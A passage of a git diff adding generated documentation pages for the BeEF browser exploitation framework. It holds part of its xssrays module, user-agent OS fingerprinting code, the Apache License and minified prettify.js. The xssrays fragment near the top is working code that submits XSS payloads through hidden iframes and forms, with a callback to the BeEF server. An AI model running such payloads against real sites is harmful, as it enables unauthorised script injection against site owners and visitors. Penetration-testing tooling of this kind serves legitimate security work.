+ "&amp;action=ray" + "&amp;p='+window.location.href+'&amp;n=" + ray.vector.name + "&amp;m=" + ray.vector.method + "'";
exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
form += '&lt;textarea name="' + i + '">' + exploit + '&lt;\/textarea>';
beef.debug("form param[" + i + "] = " + params[i].toString());
paramsPos++;
}
}
form += '&lt;\/form>';
document.body.appendChild(iframe);
beef.debug("Creating form [" + form + "]");
iframe.contentWindow.document.writeln(form);
iframe.contentWindow.document.writeln('&lt;script>document.createElement("form").submit.apply(document.forms[0]);&lt;\/script>');
beef.debug("Submitting form");
}
});
},
/**
* run the jobs (run functions added to the stack), and clean the shit (iframes) from the DOM after a timeout value
*/
runJobs: function() {
var that = this;
this.totalConnections = this.stack.length;
that.getNextJob();
setInterval(function() {
var numOfConnections = 0;
for (var i = 0; i &lt; document.getElementsByTagName('iframe').length; i++) {
var iframe = document.getElementsByTagName('iframe')[i];
numOfConnections++;
//beef.debug("runJobs parseInt(this.timestamp()) [" + parseInt(beef.net.xssrays.timestamp()) + "], parseInt(iframe.time) [" + parseInt(iframe.time) + "]");
if (parseInt(beef.net.xssrays.timestamp()) - parseInt(iframe.time) > 5) {
try{
if (iframe) {
beef.net.xssrays.complete();
beef.debug("RunJobs cleaning up iFrame [" + iframe.id + "]");
document.body.removeChild(iframe);
}
}catch(e){
beef.debug("Exception [" + e.toString() + "] when cleaning iframes.")
}
}
}
if (numOfConnections == 0) {
clearTimeout(this);
}
}, this.cleanUpTimeout);
return this;
},
timestamp: function() {
return parseInt(new Date().getTime().toString().substring(0, 10));
},
escape: function(str) {
str = str.toString();
str = str.replace(/&lt;/g, '&amp;lt;');
str = str.replace(/>/g, '&amp;gt;');
str = str.replace(/\u0022/g, '&amp;quot;');
str = str.replace(/\u0027/g, '&amp;#39;');
str = str.replace(/\\/g, '&amp;#92;');
return str;
}
};
beef.regCmp('beef.net.xssrays');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

412
docs/os.js.html Normal file
View File

@@ -0,0 +1,412 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: os.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: os.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/** @namespace beef.os */
beef.os = {
ua: navigator.userAgent,
/**
* Detect default browser (IE only)
* Written by unsticky
* http://ha.ckers.org/blog/20070319/detecting-default-browser-in-ie/
* @return {string}
*/
getDefaultBrowser: function() {
var result = "Unknown"
try {
var mt = document.mimeType;
if (mt) {
if (mt == "Safari Document") result = "Safari";
if (mt == "Firefox HTML Document") result = "Firefox";
if (mt == "Chrome HTML Document") result = "Chrome";
if (mt == "HTML Document") result = "Internet Explorer";
if (mt == "Opera Web Document") result = "Opera";
}
} catch (e) {
beef.debug("[os] getDefaultBrowser: "+e.message);
}
return result;
},
// the likelihood that we hook Windows 3.11 (which has only Win in the UA string) is zero in 2015
/**
* @return {boolean}
*/
isWin311: function() {
return (this.ua.match('(Win16)')) ? true : false;
},
/**
* @return {boolean}
*/
isWinNT4: function() {
return (this.ua.match('(Windows NT 4.0)')) ? true : false;
},
/**
* @return {boolean}
*/
isWin95: function() {
return (this.ua.match('(Windows 95)|(Win95)|(Windows_95)')) ? true : false;
},
/**
* @return {boolean}
*/
isWinCE: function() {
return (this.ua.match('(Windows CE)')) ? true : false;
},
/**
* @return {boolean}
*/
isWin98: function() {
return (this.ua.match('(Windows 98)|(Win98)')) ? true : false;
},
/**
* @return {boolean}
*/
isWinME: function() {
return (this.ua.match('(Windows ME)|(Win 9x 4.90)')) ? true : false;
},
/**
* @return {boolean}
*/
isWin2000: function() {
return (this.ua.match('(Windows NT 5.0)|(Windows 2000)')) ? true : false;
},
/**
* @return {boolean}
*/
isWin2000SP1: function() {
return (this.ua.match('Windows NT 5.01 ')) ? true : false;
},
/**
* @return {boolean}
*/
isWinXP: function() {
return (this.ua.match('(Windows NT 5.1)|(Windows XP)')) ? true : false;
},
/**
* @return {boolean}
*/
isWinServer2003: function() {
return (this.ua.match('(Windows NT 5.2)')) ? true : false;
},
/**
* @return {boolean}
*/
isWinVista: function() {
return (this.ua.match('(Windows NT 6.0)')) ? true : false;
},
/**
* @return {boolean}
*/
isWin7: function() {
return (this.ua.match('(Windows NT 6.1)|(Windows NT 7.0)')) ? true : false;
},
/**
* @return {boolean}
*/
isWin8: function() {
return (this.ua.match('(Windows NT 6.2)')) ? true : false;
},
/**
* @return {boolean}
*/
isWin81: function() {
return (this.ua.match('(Windows NT 6.3)')) ? true : false;
},
/**
* @return {boolean}
*/
isWin10: function() {
return (this.ua.match('Windows NT 10.0')) ? true : false;
},
/**
* @return {boolean}
*/
isOpenBSD: function() {
return (this.ua.indexOf('OpenBSD') != -1) ? true : false;
},
/**
* @return {boolean}
*/
isSunOS: function() {
return (this.ua.indexOf('SunOS') != -1) ? true : false;
},
/**
* @return {boolean}
*/
isLinux: function() {
return (this.ua.match('(Linux)|(X11)')) ? true : false;
},
/**
* @return {boolean}
*/
isMacintosh: function() {
return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false;
},
/**
* @return {boolean}
*/
isOsxYosemite: function(){ // TODO
return (this.ua.match('(OS X 10_10)|(OS X 10.10)')) ? true : false;
},
/**
* @return {boolean}
*/
isOsxMavericks: function(){ // TODO
return (this.ua.match('(OS X 10_9)|(OS X 10.9)')) ? true : false;
},
/**
* @return {boolean}
*/
isOsxSnowLeopard: function(){ // TODO
return (this.ua.match('(OS X 10_8)|(OS X 10.8)')) ? true : false;
},
/**
* @return {boolean}
*/
isOsxLeopard: function(){ // TODO
return (this.ua.match('(OS X 10_7)|(OS X 10.7)')) ? true : false;
},
/**
* @return {boolean}
*/
isWinPhone: function() {
return (this.ua.match('(Windows Phone)')) ? true : false;
},
/**
* @return {boolean}
*/
isIphone: function() {
return (this.ua.indexOf('iPhone') != -1) ? true : false;
},
/**
* @return {boolean}
*/
isIpad: function() {
return (this.ua.indexOf('iPad') != -1) ? true : false;
},
/**
* @return {boolean}
*/
isIpod: function() {
return (this.ua.indexOf('iPod') != -1) ? true : false;
},
/**
* @return {boolean}
*/
isNokia: function() {
return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
},
/**
* @return {boolean}
*/
isAndroid: function() {
return (this.ua.match('Android')) ? true : false;
},
/**
* @return {boolean}
*/
isBlackBerry: function() {
return (this.ua.match('BlackBerry')) ? true : false;
},
/**
* @return {boolean}
*/
isWebOS: function() {
return (this.ua.match('webOS')) ? true : false;
},
/**
* @return {boolean}
*/
isQNX: function() {
return (this.ua.match('QNX')) ? true : false;
},
/**
* @return {boolean}
*/
isBeOS: function() {
return (this.ua.match('BeOS')) ? true : false;
},
/**
* @return {boolean}
*/
isAros: function() {
return (this.ua.match('AROS')) ? true : false;
},
/**
* @return {boolean}
*/
isWindows: function() {
return (this.ua.match('Windows')) ? true : false;
},
/**
* @return {string}
*/
getName: function() {
if(this.isWindows()){
return 'Windows';
}
if(this.isMacintosh()) {
return 'OSX';
}
//Nokia
if(this.isNokia()) {
if (this.ua.indexOf('Maemo Browser') != -1) return 'Maemo';
if (this.ua.match('(SymbianOS)|(Symbian OS)')) return 'SymbianOS';
if (this.ua.indexOf('Symbian') != -1) return 'Symbian';
}
// BlackBerry
if(this.isBlackBerry()) return 'BlackBerry OS';
// Android
if(this.isAndroid()) return 'Android';
// SunOS
if(this.isSunOS()) return 'SunOS';
//Linux
if(this.isLinux()) return 'Linux';
//iPhone
if (this.isIphone()) return 'iOS';
//iPad
if (this.isIpad()) return 'iOS';
//iPod
if (this.isIpod()) return 'iOS';
//others
if(this.isQNX()) return 'QNX';
if(this.isBeOS()) return 'BeOS';
if(this.isWebOS()) return 'webOS';
if(this.isAros()) return 'AROS';
return 'unknown';
},
/**
* Get OS architecture.
* This may not be the same as the browser arch or CPU arch.
* ie, 32bit OS on 64bit hardware
*/
getArch: function() {
var arch = 'unknown';
try {
var arch = platform.os.architecture;
if (!!arch)
return arch;
} catch (e) {}
return arch;
},
/**
* Get OS family
*/
getFamily: function() {
var family = 'unknown';
try {
var family = platform.os.family;
if (!!family)
return family;
} catch (e) {}
return arch;
},
/**
* Get OS name
* @return {string}
*/
getVersion: function(){
//Windows
if(this.isWindows()) {
if (this.isWin10()) return '10';
if (this.isWin81()) return '8.1';
if (this.isWin8()) return '8';
if (this.isWin7()) return '7';
if (this.isWinVista()) return 'Vista';
if (this.isWinXP()) return 'XP';
if (this.isWinServer2003()) return 'Server 2003';
if (this.isWin2000SP1()) return '2000 SP1';
if (this.isWin2000()) return '2000';
if (this.isWinME()) return 'Millenium';
if (this.isWinNT4()) return 'NT 4';
if (this.isWinCE()) return 'CE';
if (this.isWin95()) return '95';
if (this.isWin98()) return '98';
}
// OS X
if(this.isMacintosh()) {
if (this.isOsxYosemite()) return '10.10';
if (this.isOsxMavericks()) return '10.9';
if (this.isOsxSnowLeopard()) return '10.8';
if (this.isOsxLeopard()) return '10.7';
}
// TODO add Android/iOS version detection
}
};
beef.regCmp('beef.net.os');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

1147
docs/platform.html Normal file
View File

File diff suppressed because it is too large Load Diff

25
docs/scripts/linenumber.js Normal file
View File

@@ -0,0 +1,25 @@
/*global document */
(() => {
const source = document.getElementsByClassName('prettyprint source linenums');
let i = 0;
let lineNumber = 0;
let lineId;
let lines;
let totalLines;
let anchorHash;
if (source && source[0]) {
anchorHash = document.location.hash.substring(1);
lines = source[0].getElementsByTagName('li');
totalLines = lines.length;
for (; i < totalLines; i++) {
lineNumber++;
lineId = `line${lineNumber}`;
lines[i].id = lineId;
if (lineId === anchorHash) {
lines[i].className += ' selected';
}
}
}
})();

202
docs/scripts/prettify/Apache-License-2.0.txt Normal file
View File

@@ -0,0 +1,202 @@
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "[]"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. We also recommend that a
file or class name and description of purpose be included on the
same "printed page" as the copyright notice for easier
identification within third-party archives.
Copyright [yyyy] [name of copyright owner]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.

2
docs/scripts/prettify/lang-css.js Normal file
View File

@@ -0,0 +1,2 @@
PR.registerLangHandler(PR.createSimpleLexer([["pln",/^[\t\n\f\r ]+/,null," \t\r\n "]],[["str",/^"(?:[^\n\f\r"\\]|\\(?:\r\n?|\n|\f)|\\[\S\s])*"/,null],["str",/^'(?:[^\n\f\r'\\]|\\(?:\r\n?|\n|\f)|\\[\S\s])*'/,null],["lang-css-str",/^url\(([^"')]*)\)/i],["kwd",/^(?:url|rgb|!important|@import|@page|@media|@charset|inherit)(?=[^\w-]|$)/i,null],["lang-css-kw",/^(-?(?:[_a-z]|\\[\da-f]+ ?)(?:[\w-]|\\\\[\da-f]+ ?)*)\s*:/i],["com",/^\/\*[^*]*\*+(?:[^*/][^*]*\*+)*\//],["com",
/^(?:<\!--|--\>)/],["lit",/^(?:\d+|\d*\.\d+)(?:%|[a-z]+)?/i],["lit",/^#[\da-f]{3,6}/i],["pln",/^-?(?:[_a-z]|\\[\da-f]+ ?)(?:[\w-]|\\\\[\da-f]+ ?)*/i],["pun",/^[^\s\w"']+/]]),["css"]);PR.registerLangHandler(PR.createSimpleLexer([],[["kwd",/^-?(?:[_a-z]|\\[\da-f]+ ?)(?:[\w-]|\\\\[\da-f]+ ?)*/i]]),["css-kw"]);PR.registerLangHandler(PR.createSimpleLexer([],[["str",/^[^"')]+/]]),["css-str"]);

28
docs/scripts/prettify/prettify.js Normal file
View File

@@ -0,0 +1,28 @@
var q=null;window.PR_SHOULD_USE_CONTINUATION=!0;
(function(){function L(a){function m(a){var f=a.charCodeAt(0);if(f!==92)return f;var b=a.charAt(1);return(f=r[b])?f:"0"<=b&&b<="7"?parseInt(a.substring(1),8):b==="u"||b==="x"?parseInt(a.substring(2),16):a.charCodeAt(1)}function e(a){if(a<32)return(a<16?"\\x0":"\\x")+a.toString(16);a=String.fromCharCode(a);if(a==="\\"||a==="-"||a==="["||a==="]")a="\\"+a;return a}function h(a){for(var f=a.substring(1,a.length-1).match(/\\u[\dA-Fa-f]{4}|\\x[\dA-Fa-f]{2}|\\[0-3][0-7]{0,2}|\\[0-7]{1,2}|\\[\S\s]|[^\\]/g),a=
[],b=[],o=f[0]==="^",c=o?1:0,i=f.length;c<i;++c){var j=f[c];if(/\\[bdsw]/i.test(j))a.push(j);else{var j=m(j),d;c+2<i&&"-"===f[c+1]?(d=m(f[c+2]),c+=2):d=j;b.push([j,d]);d<65||j>122||(d<65||j>90||b.push([Math.max(65,j)|32,Math.min(d,90)|32]),d<97||j>122||b.push([Math.max(97,j)&-33,Math.min(d,122)&-33]))}}b.sort(function(a,f){return a[0]-f[0]||f[1]-a[1]});f=[];j=[NaN,NaN];for(c=0;c<b.length;++c)i=b[c],i[0]<=j[1]+1?j[1]=Math.max(j[1],i[1]):f.push(j=i);b=["["];o&&b.push("^");b.push.apply(b,a);for(c=0;c<
f.length;++c)i=f[c],b.push(e(i[0])),i[1]>i[0]&&(i[1]+1>i[0]&&b.push("-"),b.push(e(i[1])));b.push("]");return b.join("")}function y(a){for(var f=a.source.match(/\[(?:[^\\\]]|\\[\S\s])*]|\\u[\dA-Fa-f]{4}|\\x[\dA-Fa-f]{2}|\\\d+|\\[^\dux]|\(\?[!:=]|[()^]|[^()[\\^]+/g),b=f.length,d=[],c=0,i=0;c<b;++c){var j=f[c];j==="("?++i:"\\"===j.charAt(0)&&(j=+j.substring(1))&&j<=i&&(d[j]=-1)}for(c=1;c<d.length;++c)-1===d[c]&&(d[c]=++t);for(i=c=0;c<b;++c)j=f[c],j==="("?(++i,d[i]===void 0&&(f[c]="(?:")):"\\"===j.charAt(0)&&
(j=+j.substring(1))&&j<=i&&(f[c]="\\"+d[i]);for(i=c=0;c<b;++c)"^"===f[c]&&"^"!==f[c+1]&&(f[c]="");if(a.ignoreCase&&s)for(c=0;c<b;++c)j=f[c],a=j.charAt(0),j.length>=2&&a==="["?f[c]=h(j):a!=="\\"&&(f[c]=j.replace(/[A-Za-z]/g,function(a){a=a.charCodeAt(0);return"["+String.fromCharCode(a&-33,a|32)+"]"}));return f.join("")}for(var t=0,s=!1,l=!1,p=0,d=a.length;p<d;++p){var g=a[p];if(g.ignoreCase)l=!0;else if(/[a-z]/i.test(g.source.replace(/\\u[\da-f]{4}|\\x[\da-f]{2}|\\[^UXux]/gi,""))){s=!0;l=!1;break}}for(var r=
{b:8,t:9,n:10,v:11,f:12,r:13},n=[],p=0,d=a.length;p<d;++p){g=a[p];if(g.global||g.multiline)throw Error(""+g);n.push("(?:"+y(g)+")")}return RegExp(n.join("|"),l?"gi":"g")}function M(a){function m(a){switch(a.nodeType){case 1:if(e.test(a.className))break;for(var g=a.firstChild;g;g=g.nextSibling)m(g);g=a.nodeName;if("BR"===g||"LI"===g)h[s]="\n",t[s<<1]=y++,t[s++<<1|1]=a;break;case 3:case 4:g=a.nodeValue,g.length&&(g=p?g.replace(/\r\n?/g,"\n"):g.replace(/[\t\n\r ]+/g," "),h[s]=g,t[s<<1]=y,y+=g.length,
t[s++<<1|1]=a)}}var e=/(?:^|\s)nocode(?:\s|$)/,h=[],y=0,t=[],s=0,l;a.currentStyle?l=a.currentStyle.whiteSpace:window.getComputedStyle&&(l=document.defaultView.getComputedStyle(a,q).getPropertyValue("white-space"));var p=l&&"pre"===l.substring(0,3);m(a);return{a:h.join("").replace(/\n$/,""),c:t}}function B(a,m,e,h){m&&(a={a:m,d:a},e(a),h.push.apply(h,a.e))}function x(a,m){function e(a){for(var l=a.d,p=[l,"pln"],d=0,g=a.a.match(y)||[],r={},n=0,z=g.length;n<z;++n){var f=g[n],b=r[f],o=void 0,c;if(typeof b===
"string")c=!1;else{var i=h[f.charAt(0)];if(i)o=f.match(i[1]),b=i[0];else{for(c=0;c<t;++c)if(i=m[c],o=f.match(i[1])){b=i[0];break}o||(b="pln")}if((c=b.length>=5&&"lang-"===b.substring(0,5))&&!(o&&typeof o[1]==="string"))c=!1,b="src";c||(r[f]=b)}i=d;d+=f.length;if(c){c=o[1];var j=f.indexOf(c),k=j+c.length;o[2]&&(k=f.length-o[2].length,j=k-c.length);b=b.substring(5);B(l+i,f.substring(0,j),e,p);B(l+i+j,c,C(b,c),p);B(l+i+k,f.substring(k),e,p)}else p.push(l+i,b)}a.e=p}var h={},y;(function(){for(var e=a.concat(m),
l=[],p={},d=0,g=e.length;d<g;++d){var r=e[d],n=r[3];if(n)for(var k=n.length;--k>=0;)h[n.charAt(k)]=r;r=r[1];n=""+r;p.hasOwnProperty(n)||(l.push(r),p[n]=q)}l.push(/[\S\s]/);y=L(l)})();var t=m.length;return e}function u(a){var m=[],e=[];a.tripleQuotedStrings?m.push(["str",/^(?:'''(?:[^'\\]|\\[\S\s]|''?(?=[^']))*(?:'''|$)|"""(?:[^"\\]|\\[\S\s]|""?(?=[^"]))*(?:"""|$)|'(?:[^'\\]|\\[\S\s])*(?:'|$)|"(?:[^"\\]|\\[\S\s])*(?:"|$))/,q,"'\""]):a.multiLineStrings?m.push(["str",/^(?:'(?:[^'\\]|\\[\S\s])*(?:'|$)|"(?:[^"\\]|\\[\S\s])*(?:"|$)|`(?:[^\\`]|\\[\S\s])*(?:`|$))/,
q,"'\"`"]):m.push(["str",/^(?:'(?:[^\n\r'\\]|\\.)*(?:'|$)|"(?:[^\n\r"\\]|\\.)*(?:"|$))/,q,"\"'"]);a.verbatimStrings&&e.push(["str",/^@"(?:[^"]|"")*(?:"|$)/,q]);var h=a.hashComments;h&&(a.cStyleComments?(h>1?m.push(["com",/^#(?:##(?:[^#]|#(?!##))*(?:###|$)|.*)/,q,"#"]):m.push(["com",/^#(?:(?:define|elif|else|endif|error|ifdef|include|ifndef|line|pragma|undef|warning)\b|[^\n\r]*)/,q,"#"]),e.push(["str",/^<(?:(?:(?:\.\.\/)*|\/?)(?:[\w-]+(?:\/[\w-]+)+)?[\w-]+\.h|[a-z]\w*)>/,q])):m.push(["com",/^#[^\n\r]*/,
q,"#"]));a.cStyleComments&&(e.push(["com",/^\/\/[^\n\r]*/,q]),e.push(["com",/^\/\*[\S\s]*?(?:\*\/|$)/,q]));a.regexLiterals&&e.push(["lang-regex",/^(?:^^\.?|[!+-]|!=|!==|#|%|%=|&|&&|&&=|&=|\(|\*|\*=|\+=|,|-=|->|\/|\/=|:|::|;|<|<<|<<=|<=|=|==|===|>|>=|>>|>>=|>>>|>>>=|[?@[^]|\^=|\^\^|\^\^=|{|\||\|=|\|\||\|\|=|~|break|case|continue|delete|do|else|finally|instanceof|return|throw|try|typeof)\s*(\/(?=[^*/])(?:[^/[\\]|\\[\S\s]|\[(?:[^\\\]]|\\[\S\s])*(?:]|$))+\/)/]);(h=a.types)&&e.push(["typ",h]);a=(""+a.keywords).replace(/^ | $/g,
"");a.length&&e.push(["kwd",RegExp("^(?:"+a.replace(/[\s,]+/g,"|")+")\\b"),q]);m.push(["pln",/^\s+/,q," \r\n\t\xa0"]);e.push(["lit",/^@[$_a-z][\w$@]*/i,q],["typ",/^(?:[@_]?[A-Z]+[a-z][\w$@]*|\w+_t\b)/,q],["pln",/^[$_a-z][\w$@]*/i,q],["lit",/^(?:0x[\da-f]+|(?:\d(?:_\d+)*\d*(?:\.\d*)?|\.\d\+)(?:e[+-]?\d+)?)[a-z]*/i,q,"0123456789"],["pln",/^\\[\S\s]?/,q],["pun",/^.[^\s\w"-$'./@\\`]*/,q]);return x(m,e)}function D(a,m){function e(a){switch(a.nodeType){case 1:if(k.test(a.className))break;if("BR"===a.nodeName)h(a),
